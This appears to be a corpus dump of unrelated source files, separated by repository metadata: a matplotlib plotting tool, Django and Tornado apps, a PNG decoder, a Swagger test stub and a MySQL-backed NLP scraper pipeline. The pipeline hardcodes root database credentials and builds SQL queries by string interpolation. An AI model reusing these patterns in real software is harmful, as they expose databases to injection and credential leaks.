chartType = 'minute' if pbname == 'epochs' else 'chart'
ma1=5;ma2=30
datax = run_tech(df, pcol='close',winLst=[ma1,ma2],nanTF=True)
fig, axes = plot_candlestickCombo(datax,title,ma1,ma2,block=False,chartType=chartType,trendTF=trendTF,npar=npar,debugTF=debugTF,colorUD=colorUD)
if pngname is not None and len(pngname)>4:
plt.savefig(pngname)#, bbox_inches='tight',dpi=1000)
else:
plt.show(axes)
return datax
fig, ax=plt.subplots(figsize=(11,6))
if ohlcTF is True:
from alan_plot import plot_candlestick
chartType = 'minute' if pbname == 'epochs' else 'chart'
ax = plot_candlestick(df,tsidx=df.index,chartType=chartType,title=title,block=False,debugTF=debugTF,ax=ax,trendTF=trendTF,npar=npar,colorUD=colorUD)
x_fmt = "%H:%M" if chartType == 'minute' else x_fmt
print >> sys.stderr, df.describe()
else:
df.plot(ax=ax,grid=True,color=['yellow','green','red','cyan','lightgray','salmon'])
#ax=df.plot(figsize=(11,6))
ax.set_ylabel(df.columns[0])
if trendTF is True:
dg.plot(ax=ax)
if rsiYN is True:
ax.set_ylabel("return %")
ax.grid(linestyle='dotted',linewidth=0.5)
if df.index._typ == "datetimeindex":
mddfmt=mdates.DateFormatter(x_fmt)
ax.xaxis.set_major_formatter(mddfmt)
xtinterval=(df.index[1]-df.index[0])
if xtinterval.days < 7 and xtinterval.days>=1 : # daily data
ax.set_xlim(df.index[0], df.index[-1])
#ax.xaxis.set_major_locator(mdates.MonthLocator(interval=int(nsp/30.+0.97)))
bymd = [1,5,10,15,20,25] if nobs<50 else [1,15] if nobs<120 else [1]
itv = 1 if nobs<160 else int(nsp/30.+0.97)
xlocator = mdates.MonthLocator(bymonthday=bymd,interval=itv)
ax.xaxis.set_major_locator(xlocator)
# check if min/max of xaxis should be included major ticks
if debugTF is True:
print >> sys.stderr, ax.get_xticks(),ax.get_xlim()
xtcks = list(ax.get_xticks())
x1,x2 = xtcks[:2]
xmin,xmax = ax.get_xlim()
if (x1-xmin)>(x2-x1)*0.6:
xtcks = [xmin] + xtcks
if (xmax-xtcks[-1])>(x2-x1)*0.6:
xtcks = xtcks + [xmax]
ax.set_xticks(xtcks)
ax.xaxis.set_minor_locator(mdates.MonthLocator(interval=1))
if debugTF is True:
print >> sys.stderr,ax.get_xticks()
print >> sys.stderr, "Daily data use MonthLocator"
elif xtinterval.seconds < 30: # second data
locator = mdates.AutoDateLocator()
locator.intervald[5] = [0,5,10,15,20,25,30,35,40,45,55]
mddfmt = mdates.AutoDateFormatter(locator)
mddfmt.scaled[1/(24.*60.)] = '%M:%S'
ax.xaxis.set_major_locator(locator)
ax.xaxis.set_major_formatter(mddfmt)
print >> sys.stderr, "Second data use AutoDateLocator",xtinterval.seconds
elif xtinterval.seconds < 100 : # minute data
bym = [0,15,30,45] if nobs<=120 else [0,30] if nobs<=360 else [0]
xlocator = mdates.MinuteLocator(byminute=bym, interval = 1)
ax.xaxis.set_major_locator(xlocator)
print >> sys.stderr, "Minute data use MinuteLocator",xtinterval.days
else: # periodic data
print >> sys.stderr, "Periodic data use DayLocator"
ax.xaxis.set_major_locator(mdates.DayLocator(interval=nsp))
ax.xaxis.label.set_visible(False)
plt.title(title,fontsize=30,fontproperties=prop)
plt.xticks(rotation='20',fontsize=12)
if len(df.columns)>1 and ohlcTF is False:
ax.legend(loc="upper left",prop=prop)
#logo = mimage.imread("aicaas_icon.png")
#plt.figimage(logo, xo=20,yo=420)
plt.subplots_adjust(left=0.1,bottom=0.30)
if pngname is not None and len(pngname)>4:
plt.savefig(pngname)#, bbox_inches='tight',dpi=1000)
else:
plt.show(ax)
return df
def opt_csv2plot(argv,retParser=False):
""" command-line options initial setup
Arguments:
argv: list arguments, usually passed from sys.argv
retParser: OptionParser class return flag, default to False
Return: (options, args) tuple if retParser is False else OptionParser class
"""
parser = OptionParser(usage="usage: %prog [option] FILENAME", version="%prog 1.0",
description="Time-series Plotting Utility via matplotlib")
parser.add_option("-s","--sep",action="store",dest="sep",default="|",
help="field separator (default: |)")
parser.add_option("","--xaxis",action="store",dest="xaxis",default="pbdate",
help="x-axis column name (default: pbdate in yyyymmdd)")
parser.add_option("","--columns",action="store",dest="columns",
help="selected columns (default: ALL)")
parser.add_option("","--ren_header",action="store",dest="hdrLst",
help="rename header columns")
parser.add_option("-t","--title",action="store",dest="title",
help="title (default: combo-colunms)")
parser.add_option("-n","--nbins",action="store",dest="nbins",default="6",type=int,
help="number of bins in x-axis (default: 6)")
parser.add_option("","--return_since_inception",action="store_true",dest="rsiYN",default=False,
help="use Return since Inception plot. Note: $1 will be used as the initial investment if the initial is less than $1")
parser.add_option("","--interpolate",action="store_true",dest="interpolateYN",default=False,
help="use linear-interplation for missing data")
parser.add_option("","--pivot_group",action="store",dest="pivot_group",
help="pivot table group by column, must pair with PIVOT_VALUE")
parser.add_option("","--pivot_value",action="store",dest="pivot_value",
help="pivot table display value column, must pair with PIVOT_GROUP")
parser.add_option("","--x_fmt",action="store",dest="x_fmt",default='%m-%d-%y',
help="graph x-axis format (default: %m-%d-%y)")
parser.add_option("","--png",action="store",dest="pngname",
help="graph name (default: None)")
parser.add_option("","--backend",action="store",dest="backend",default='tkAgg',
help="matplotlib new backend(default: tkAgg)")
parser.add_option("","--no_time_series",action="store_false",dest="tsTF",default=True,
help="Simple line plot no time-series")
parser.add_option("-l","--lang",action="store",dest="lang",default="en",
help="language mode [cn|en] (default: en), ohlc/ohlc_combo ONLY")
parser.add_option("","--ohlc",action="store_true",dest="ohlcTF",default=False,
help="plot stock OHLC Candlestick")
parser.add_option("","--ohlc_combo",action="store_true",dest="ohlcComboTF",default=False,
help="plot stock OHLC Candlestick + MA/RSI/MACD Combo")
parser.add_option("","--src",action="store",dest="src",
help="data source (FILENAME is treated as ticker/series if provided. default: None)")
parser.add_option("","--start",action="store",dest="start",
help="start YYYY-MM-DD, must pair with SRC (default: 2-years-ago)")
parser.add_option("","--end",action="store",dest="end",
help="end YYYY-MM-DD, must pair with SRC (default: today)")
parser.add_option("","--days",action="store",dest="days",default=730,type=int,
help="number of days from END date, must pair with SRC (default: 730)")
parser.add_option("","--trendline",action="store_true",dest="trendTF",default=False,
help="Draw trendline, apply to the 1st array ONLY")
parser.add_option("","--npar",action="store",dest="npar",default=15,type="int",
help="trendline fitting polynomial degree (default: 15)")
parser.add_option("","--j2ts",action="store",dest="j2ts",
help="jinja2 template script, (default: None).")
parser.add_option("","--extra_js",action="store",dest="extraJS",
help="extra JSON in DICT format.")
parser.add_option("","--extra_xs",action="store",dest="extraXS",
help="extra excutable string in k1=v1;k2=v2; format")
parser.add_option("","--debug",action="store_true",dest="debugTF",default=False,
help="debugging (default: False)")
(options, args) = parser.parse_args(argv[1:])
if retParser is True:
return parser
try:
opts = vars(options)
from _alan_str import extra_opts
extra_opts(opts,xkey='extraJS',method='JS',updTF=True)
extra_opts(opts,xkey='extraXS',method='XS',updTF=True)
except Exception as e:
print >> sys.stderr, str(e)
return (opts, args)
if __name__ == '__main__':
opts,args = opt_csv2plot(sys.argv)
try:
df=run_csv2plot(args,opts)
#print dataj2ts(opts['j2ts'],df,opts)
except Exception, e:
print >> sys.stderr, "**ERROR:",str(e)
| [
"facebook@beyondbond.com"
] | facebook@beyondbond.com |
2d34fe0d4f1b224a9e161de674ff2f540eaf6f3f | d3f448d238b435b48d8f27f17a34b3e39a70dc29 | /python-client/test/test_kyc_user_validation_share_holder_list_item_response_natural.py | 5639c0032162e82c676318d5d1ff7f90707312d0 | [] | no_license | pedroguirao/swagger | 1fc29b6d9bcc193bf8ce85f6d8a6074f4c37150d | 5ffea6203b5fcd3f201c2ede76d354302a6fb0ee | refs/heads/master | 2020-06-07T16:15:08.659567 | 2019-06-21T07:51:49 | 2019-06-21T07:51:49 | 193,055,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,180 | py | # coding: utf-8
"""
MarketPay API
API for Smart Contracts and Payments # noqa: E501
OpenAPI spec version: v2.01
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.kyc_user_validation_share_holder_list_item_response_natural import KycUserValidationShareHolderListItemResponseNatural # noqa: E501
from swagger_client.rest import ApiException
class TestKycUserValidationShareHolderListItemResponseNatural(unittest.TestCase):
"""KycUserValidationShareHolderListItemResponseNatural unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testKycUserValidationShareHolderListItemResponseNatural(self):
"""Test KycUserValidationShareHolderListItemResponseNatural"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.kyc_user_validation_share_holder_list_item_response_natural.KycUserValidationShareHolderListItemResponseNatural() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"antonio.canovas@ingenieriacloud.com"
] | antonio.canovas@ingenieriacloud.com |
cf9fcbfc5f97eb28ceffeabff239359d989224bf | 4614e0d358cfd0a652805780049830a6175db032 | /setup.py | 8e7cfd56f66f747938969104997c709c295e8acd | [
"Apache-2.0"
] | permissive | PoncinMatthieu/skrm | bb2c48367d153681b12e150ff0214930dcba333c | 7aa0912907dfc3f8e8359568a727082fd9856523 | refs/heads/master | 2023-02-05T11:36:27.551935 | 2023-01-21T12:27:47 | 2023-01-21T12:27:47 | 8,715,387 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | import os
import setuptools
def get_readme_content():
with open("README.md", "r") as f:
return f.read()
def get_package_version():
locals = {}
with open(os.path.join("skrm", "version.py")) as fd:
exec(fd.read(), None, locals)
return locals["__version__"]
setuptools.setup(
name="skrm",
version=get_package_version(),
author="Matthieu Poncin",
author_email="poncin.matthieu@gmail.com",
description="Simple keyring manager - Allows you to store keys associated to tags into an encrypted file, using GPG.",
long_description=get_readme_content(),
long_description_content_type="text/markdown",
url="https://github.com/PoncinMatthieu/skrm",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Security :: Cryptography"
],
packages=setuptools.find_packages(include=["skrm", "skrm.*"]),
entry_points={
'console_scripts': [
'skrm = skrm.__main__:keyring_manager.run'
],
},
test_suite="tests"
)
| [
"matthieu@yousician.com"
] | matthieu@yousician.com |
07603d8448554819c35d830a5e8bac16fee86dfb | a71652fe89fe2236e9a05030ebf337e6e306bb21 | /palm_detection/main.py | 0f279c8df10362023c1059ba264ecfb5094677a0 | [
"Apache-2.0"
] | permissive | esimionato/oak-model-samples | e580affe8df6dcc01b6d26af8eb4f622fe28d01c | 0f99e9c6e5d884c1f9493e83fb6834453bcfabcb | refs/heads/main | 2023-04-13T04:43:39.306077 | 2021-04-29T14:35:10 | 2021-04-29T14:35:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | import os
from modelplace_api.visualization import draw_detections_one_frame
from oak_inference_utils import inference
from palm_detection import InferenceModel
def main():
model_cls = InferenceModel
root_model_path = os.path.abspath(os.path.dirname(__file__))
visualization = draw_detections_one_frame
inference(model_cls, root_model_path, visualization)
if __name__ == "__main__":
main()
| [
"lx.lyashuk@gmail.com"
] | lx.lyashuk@gmail.com |
44ec93f5277d83d7adb38c625d69aebf21f7de01 | 6e04f50f02f265c0db42a2f0acced9c62dd1338e | /minion game.py | 44452caa5e48819276fec4075507c338f878ad85 | [] | no_license | Akashkumarsenthil/placement_practice_python | 36c2f8d6a4186f2bc125c5c59fd92574952a4305 | 8a5425068c03f9fac13864509968018cde308033 | refs/heads/master | 2022-12-06T00:18:33.782794 | 2020-08-17T17:46:33 | 2020-08-17T17:46:33 | 262,390,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 28 13:18:39 2020
@author: akashkumar
"""
vov = "AEIOU"
s = "BANANA"
ks = 0
ss = 0
for i in range(len(s)):
if s[i] in vov:
ks += (len(s) - i)
else:
ss += (len(s) - i)
print (ks)
print (ss) | [
"akashkumarsenthil@gmail.com"
] | akashkumarsenthil@gmail.com |
209fc872585b4a759ebdb5e8eb13d9892cdbba7c | 76833905305f1df9f7f400191bf11cc4dc023a8d | /push_git.py | 3477828858f9fa307b5dd08c560975b8ae4418ed | [] | no_license | akahuang/akarc | f22548b2cfcd40ede71f422421c6dcdbf6f8e331 | 99c4fe919dc5ee86e55d8632029b22a2759c9077 | refs/heads/master | 2016-09-06T18:05:08.330985 | 2013-11-07T04:45:01 | 2013-11-07T04:45:01 | 3,591,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #!/usr/bin/python
import os
src_file = './gitconfig'
des_file = os.environ['HOME'] + '/.gitconfig'
tmp_file = './gitconfig_temp'
ignore_tag = ['[user]\n', '[github]\n']
fin = open(des_file, 'r')
fout = open(tmp_file, 'w')
ignore_flag = False
for line in fin:
# Tag
if line[0] == '[':
ignore_flag = (line in ignore_tag)
if ignore_flag == True:
fout.write(line)
fin.close()
fout.close()
os.system('cat %s >> %s' % (src_file, tmp_file))
os.system('mv %s %s' % (tmp_file, des_file))
| [
"flarehunter@gmail.com"
] | flarehunter@gmail.com |
34b703bfe7e9850d90d611a783ed74ede903d8cb | 59a0c54e182712340ee4f499b53ab92d7188cb23 | /image_png.py | de3e8106b9e10cf555d8c1fe29c61b3bbc0d6dfb | [] | no_license | bobrekjiri/BrainfuckInterpreter | 5434e66ceeaecf5287f0617a426df22568b6ee5f | f056acda447203135b506fd8a396b725b8cb4a41 | refs/heads/master | 2016-09-06T17:23:41.760238 | 2013-06-04T18:55:05 | 2013-06-04T18:55:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,659 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import zlib
class PNGWrongHeaderError(Exception):
"""Výjimka oznamující, že načítaný soubor zřejmě není PNG-obrázkem."""
pass
class PNGNotImplementedError(Exception):
"""Výjimka oznamující, že PNG-obrázek má strukturu, kterou neumíme zpracovat."""
pass
class PngReader():
"""Třída pro práci s PNG-obrázky."""
def byteArrayToNumber(self, array):
return (array[0] << 24) + (array[1] << 16) + (array[2] << 8) + array[3]
def paeth(self, a, b, c):
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
return a
elif pb <= pc:
return b
else:
return c
def getScanlines(self, data):
lines = []
for i in range(self.height):
linedata = []
base = i*((self.width * 3) + 1)
for j in range(self.width):
offset = j * 3
rgb = (data[base + offset + 1], data[base + offset + 2], data[base + offset + 3])
linedata.append(rgb)
lines.append((data[base], linedata))
return lines
def decode(self, lines):
output = []
for i in range(self.height):
linefilter = lines[i][0]
linedata = lines[i][1]
if linefilter == 0:
output.append(linedata)
elif linefilter == 1:
newlinedata = []
newlinedata.append(linedata[0])
for j in range(1,len(linedata)):
r = (linedata[j][0] + newlinedata[j-1][0]) % 256
g = (linedata[j][1] + newlinedata[j-1][1]) % 256
b = (linedata[j][2] + newlinedata[j-1][2]) % 256
newlinedata.append((r, g, b))
output.append(newlinedata)
elif linefilter == 2:
if i == 0:
output.append(linedata)
else:
newlinedata = []
for j in range(0,len(linedata)):
r = (linedata[j][0] + output[i-1][j][0]) % 256
g = (linedata[j][1] + output[i-1][j][1]) % 256
b = (linedata[j][2] + output[i-1][j][2]) % 256
newlinedata.append((r, g, b))
output.append(newlinedata)
elif linefilter == 3:
newlinedata = []
for j in range(0,len(linedata)):
fr = ((0 if j == 0 else newlinedata[j-1][0]) + (0 if i == 0 else output[i-1][j][0])) // 2
fg = ((0 if j == 0 else newlinedata[j-1][1]) + (0 if i == 0 else output[i-1][j][1])) // 2
fb = ((0 if j == 0 else newlinedata[j-1][2]) + (0 if i == 0 else output[i-1][j][2])) // 2
r = (linedata[j][0] + fr) % 256
g = (linedata[j][1] + fg) % 256
b = (linedata[j][2] + fb) % 256
newlinedata.append((r, g, b))
output.append(newlinedata)
elif linefilter == 4:
newlinedata = []
for j in range(0,len(linedata)):
ra = 0 if j == 0 else newlinedata[j-1][0]
rb = 0 if i == 0 else output[i-1][j ][0]
rc = 0 if i == 0 or j == 0 else output[i-1][j-1][0]
ga = 0 if j == 0 else newlinedata[j-1][1]
gb = 0 if i == 0 else output[i-1][j ][1]
gc = 0 if i == 0 or j == 0 else output[i-1][j-1][1]
ba = 0 if j == 0 else newlinedata[j-1][2]
bb = 0 if i == 0 else output[i-1][j ][2]
bc = 0 if i == 0 or j == 0 else output[i-1][j-1][2]
r = (linedata[j][0] + self.paeth(ra, rb, rc)) % 256
g = (linedata[j][1] + self.paeth(ga, gb, gc)) % 256
b = (linedata[j][2] + self.paeth(ba, bb, bc)) % 256
newlinedata.append((r, g, b))
output.append(newlinedata)
return output
def __init__(self, filepath):
data = bytearray()
with open(filepath, mode='br') as f:
header = f.read(8)
if header != b'\x89PNG\r\n\x1a\n':
raise PNGWrongHeaderError()
while 1:
sizeData = f.read(4)
chunkSize = self.byteArrayToNumber(sizeData)
chunkType = f.read(4)
chunkData = f.read(chunkSize)
chunkCRC = f.read(4)
computedCRC = zlib.crc32(chunkType + chunkData)
givenCRC = self.byteArrayToNumber(chunkCRC)
if computedCRC != givenCRC:
raise PNGNotImplementedError()
if chunkType == b'IDAT':
data += chunkData
elif chunkType == b'IHDR':
self.width = self.byteArrayToNumber(chunkData[0:4])
self.height = self.byteArrayToNumber(chunkData[4:8])
if chunkData[8:] != b'\x08\x02\x00\x00\x00':
raise PNGNotImplementedError()
elif chunkType == b'IEND':
break
decompressed = zlib.decompress(data)
lines = self.getScanlines(decompressed)
# RGB-data obrázku jako seznam seznamů řádek,
# v každé řádce co pixel, to trojce (R, G, B)
self.rgb = self.decode(lines)
| [
"bobrekjiri@gmail.com"
] | bobrekjiri@gmail.com |
61e9e6dde2b0b46ea65e8574120b84b1ac84b6d3 | 289462e18c368e9189dc68bef9ce4695900ab0c6 | /Artificial Intelligence/Adjusting the operating time of the sprinkler/Logic/Rule.py | 7d85aeccac0acba6b9ad4d2f8099568fc038979d | [] | no_license | tatarflavia/CS-UBB-projects | 4d933beea2e2c97355fc6a95311e1feef97232ef | 61f9113b1314180f7b40bba54cd99a195fefc521 | refs/heads/master | 2023-07-17T23:46:04.163457 | 2021-09-12T14:12:06 | 2021-09-12T14:12:06 | 298,521,030 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | class FuzzyRule(object):
# conjunctive fuzzy rule; temperature and humidity => time
def __init__(self, inputs, out):
self.inputDescriptions = inputs #dictionary of descriptionName and region chosen
self.outputDescription = out #expected time region for the inputs given
def applyRule(self, fuzzyInputs):
# transforms fuzzy inputs into fuzzy output by applying this rule
# Receives a dictionary of all the input values {'humidity': {'dry': 0, 'normal': 0.9, 'wet': 0.1}, 'temperature': {..}} and returns the conjunction of their values,getting the min for each description
# and = min ; or = max
# returns a fuzzy value : of form [{time: '..'},Minvalue]
return [self.outputDescription,
min([fuzzyInputs[descName][regionName] for descName, regionName in self.inputDescriptions.items()])
]
| [
"tatar.flavia25@gmail.com"
] | tatar.flavia25@gmail.com |
6bdb32efa294dfb859cd7b99eb9f9700b6f6217e | 3c153c631f6663cdc239b0864c90f39396effeec | /display_all_gestures.py | 21d291ada2fbcf8082548b9726210c09825fab30 | [] | no_license | agentdragonborn/slr | 4dc0606f805aed0e70227cc8fbbefbcda10660d0 | 05bfed57a9b6cc68a908846d3173028f97988a86 | refs/heads/master | 2020-03-07T13:15:57.703122 | 2018-03-31T04:11:51 | 2018-03-31T04:11:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | import cv2, os, random
import numpy as np
def get_image_size():
img = cv2.imread('gestures/0/100.jpg', 0)
return img.shape
gestures = os.listdir('gestures/')
gestures.sort(key = int)
begin_index = 0
end_index = 5
image_x, image_y = get_image_size()
if len(gestures)%5 != 0:
rows = int(len(gestures)/5)+1
else:
rows = int(len(gestures)/5)
full_img = None
for i in range(rows):
col_img = None
for j in range(begin_index, end_index):
img_path = "gestures/%s/%d.jpg" % (j, random.randint(1, 1200))
img = cv2.imread(img_path, 0)
if np.any(img == None):
img = np.zeros((image_y, image_x), dtype = np.uint8)
if np.any(col_img == None):
col_img = img
else:
col_img = np.hstack((col_img, img))
begin_index += 5
end_index += 5
if np.any(full_img == None):
full_img = col_img
else:
full_img = np.vstack((full_img, col_img))
cv2.imshow("gestures", full_img)
cv2.waitKey(0) | [
"noreply@github.com"
] | agentdragonborn.noreply@github.com |
37201c646a7df5155dcc8adffb9a2760f1ccc49e | edd319c79c04556a2c92dcd199adb1dbb1681039 | /project/django_project/blog/migrations/0005_auto_20181226_0344.py | e679daa12cf84e56e91c4106a819ebb1c09fe487 | [] | no_license | HeyFei/python | fc61627bff6b8788b0dce6d761cea25ddcf54ab7 | fd18df5374e65cea6fe21de11e055ab4234e1c4d | refs/heads/master | 2021-10-12T01:00:32.274910 | 2019-01-31T09:24:37 | 2019-01-31T09:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # Generated by Django 2.1.4 on 2018-12-26 03:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_reply'),
]
operations = [
migrations.RemoveField(
model_name='reply',
name='author',
),
migrations.DeleteModel(
name='Reply',
),
]
| [
"sjm@33.cn"
] | sjm@33.cn |
a099eace761779e208bf5c9c8b0c650a9bdd1f89 | 511caee38fe751453f0307c7ce6b9b40642dc9a0 | /schedule/tests/BaseTestCase.py | 237fc8ee352540c0c4f0b4a894c44a43650df119 | [] | no_license | M1zz/greedyRainbow | 88839852eaa921355ed2b723acbc75e76f617c00 | f380e9ef8ab07152fd0f5646d42d955508d813cc | refs/heads/master | 2020-05-07T16:25:45.951239 | 2019-05-20T14:57:23 | 2019-05-20T14:57:23 | 180,682,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | from django.test import TestCase
class BaseTestCase(TestCase):
def assertHasAnyType(self, arr, cls):
self.assertTrue(any([isinstance(item, cls) for item in arr])) | [
"mizzking75@gmail.com"
] | mizzking75@gmail.com |
f417f51f5cf08c592eee41208b983cd2c88c6fc5 | 18bdf174975bb8fdbaf51a82c0509585e0cbf6d4 | /Degree/urls.py | 8a9d15a9bc5768ade1e26d252955a5f3f20a7228 | [] | no_license | kumarajeet024/degree | 4c90388ca0d05dbc1bdc2d517a2dea0ec717059a | 7b0fef11055c66b741182405886bd753cc75f083 | refs/heads/master | 2020-04-14T18:25:31.279846 | 2019-01-05T20:51:22 | 2019-01-05T20:51:22 | 164,017,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | """Degree URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('weather.urls')),
]
| [
"kumarajeet024@gmail.com"
] | kumarajeet024@gmail.com |
ded27cf958fde5c1dfa9281f1beb37d3c09a054e | a7cc063e55b2873a82df6e14687d7b0f47f81239 | /blog/urls.py | cf0da9e0af5b619e3070b970dacc408260ac3736 | [] | no_license | komalberia21/my-first-blog | 30474a20692d2bf8368043a69a2401c2203d9e4c | 988f492e384c238b91eaac85fdea1d7c2adf53b4 | refs/heads/master | 2020-06-03T02:26:09.749569 | 2019-08-29T11:20:47 | 2019-08-29T11:20:47 | 191,395,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.post_list , name='post_list'),
path('post/<int:pk>/', views.post_detail, name='post_detail'),
path('post/new/', views.post_new, name='post_new'),
path('post/<int:pk>/edit/', views.post_edit, name='post_edit'),
]
| [
"komalberia21@gmail.com"
] | komalberia21@gmail.com |
99788176d473d88c0e2070ca3d2dbe70ffc4835f | ee791a94df95be9d77fc76071b8b194e184113b3 | /main.py | 79a8727d182ef1c2ab168ecfa1c5074199d8f5d2 | [] | no_license | msb00003/boiler | bde99844aa56eed004c263e8d7415e6b8bf846d7 | d3962386ceb883d93d3808f97112574e5a42f820 | refs/heads/master | 2020-04-14T22:21:53.248312 | 2019-01-09T21:36:11 | 2019-01-09T21:36:11 | 164,159,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | from tornado.ioloop import PeriodicCallback, IOLoop
from tornado.web import Application
from handlers.timing.handler import TimingHandler, get_targets
from hardware.boiler import set_boiler_high, set_boiler_low
from hardware.display import render_targets
from hardware.temperature import get_current_temperature
def get_target():
current_target, next_target = get_targets()
current_temperate = get_current_temperature()
render_targets(current_target, next_target, current_temperate)
if current_target.target > current_temperate:
set_boiler_high()
else:
set_boiler_low()
print(current_target.target, current_temperate)
def make_app():
PeriodicCallback(get_target, 1000).start()
return Application([
(r"/", TimingHandler),
])
if __name__ == "__main__":
app = make_app()
app.listen(8080)
IOLoop.current().start()
| [
"msb00003@gmail.com"
] | msb00003@gmail.com |
1de1b2caa5a46a524e310c70cb4922b59d81d69c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03106/s261285927.py | acddd8336d17f956526b10a5358983a3ae205bef | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | import sys
a,b,k=map(int,input().split())
for i in range(1,101):
if a%(101-i)==0 and b%(101-i)==0:
k-=1
if k==0:
print(101-i)
sys.exit() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d3ce36ee607193f43fbbd6bd77c5c2efe6ce294f | 6bb724ac45b939c2d0a8c91b20bed05123b160f0 | /Web/NLP_server/public/headless/pipeline.py | c9cf5cfcd996f6eabedfbf6ac1761cc40a2a7660 | [] | no_license | Longfei-Zhao/CHIIA | 1654bef9c2be60aed2854e420264736d1f64027d | f8560fd8ff978c6ae3383f6be34e569c80ac35a1 | refs/heads/master | 2021-10-11T11:26:41.165788 | 2019-01-25T07:41:28 | 2019-01-25T07:41:28 | 167,494,582 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,916 | py | # encoding=utf-8
import MySQLdb
from log import logger
from bs4 import BeautifulSoup
db = MySQLdb.connect("localhost", "root", "root", "NLP", charset='utf8')
settings = {'id':None,'term':None,'startDate':None,'endDate':None}
def processItem(id,title,author,content,date,crawldate,url,source):
""" put item into mysql database """
try:
table_content = processField(content,source)
table_content['id'] = id
table_content['date'] = date
table_content['crawldate'] = crawldate
table_content['content'] = MySQLdb.escape_string(content).decode('utf-8','ignore').encode("utf-8")
table_content['url'] = MySQLdb.escape_string(url)
table_content['source'] = MySQLdb.escape_string(source)
table_content['title'] = MySQLdb.escape_string(title).decode('utf-8','ignore').encode("utf-8")
table_content['author'] = MySQLdb.escape_string(author)
key_list =''
value_list = ''
for key in table_content:
key_list = key_list +',' + key
value_list = value_list + ",'{}'".format(table_content[key])
key_list=key_list[1:]
value_list=value_list[1:]
sql = "insert into NLP_ARTICLE({}) values({})".format(key_list,value_list)
# print(key_list,value_list)
# sql = "insert into NLP_ARTICLE(ID,title,author,content,date,crawldate,url,source) values('%s','%s','%s','%s','%s','%s','%s','%s')"
params =(id, title, author,content, date,crawldate,url,source)
# excute sql command
cursor = db.cursor()
cursor.execute(sql)
# commit changes
db.commit()
return 1
except Exception as e:
logger.error('Cannot access database! Error Message:{}'.format(e))
# Rollback in case there is any error
db.rollback()
return 0
# shut donw database
def checkItemExist(id):
sql = "select ID from NLP_ARTICLE where ID = '%s'" % id
cursor = db.cursor()
cursor.execute(sql)
result = cursor.fetchall()
if result:
return True
else:
return False
def loadSettings():
for key in settings:
sql = "select {} from NLP_SPIDER order by id DESC limit 1".format(key)
cursor = db.cursor()
cursor.execute(sql)
if key == 'startDate':
full_date = (cursor.fetchone())[0]
logger.info('Load settings: startDate = {}'.format(full_date))
settings[key] = {'date':full_date,'frd':full_date.day,'frm':full_date.month,'fry':full_date.year}
elif key == 'endDate':
full_date = (cursor.fetchone())[0]
logger.info('Load settings: endDate = {}'.format(full_date))
settings[key] = {'date':full_date,'tod':full_date.day,'tom':full_date.month,'toy':full_date.year}
else:
settings[key] = (cursor.fetchone())[0]
logger.info('Load settings: {} = {}'.format(key,settings[key]))
return settings
def getTaskID():
sql = "select id from NLP_SPIDER order by id DESC limit 1"
cursor = db.cursor()
cursor.execute(sql)
id = (cursor.fetchone())[0]
return id
def getDatabase():
return db
def updateProgress(progress):
sql = "update NLP_SPIDER set progress={} where id = {}".format(progress,settings['id'])
cursor = db.cursor()
cursor.execute(sql)
db.commit()
def processField(html,source):
table_content = dict()
if source not in ['Publication','Dowjones']:
return table_content
soup = BeautifulSoup(html,features="html.parser")
for tr in soup.find_all('tr'):
field = list(tr.children)[0].get_text(strip=True)
content = list(tr.children)[1].get_text(strip=True)
table_content[field] = MySQLdb.escape_string(content)
#logger.info('{}'.format(table_content))
table_content.pop('BY', None)
table_content.pop('IN',None)
return table_content
def getArticleByID(id):
sql = "select ID,HD,LP,TD from NLP_ARTICLE where ID = '%s'" % id
cursor = db.cursor()
cursor.execute(sql)
result = (cursor.fetchone())
if result:
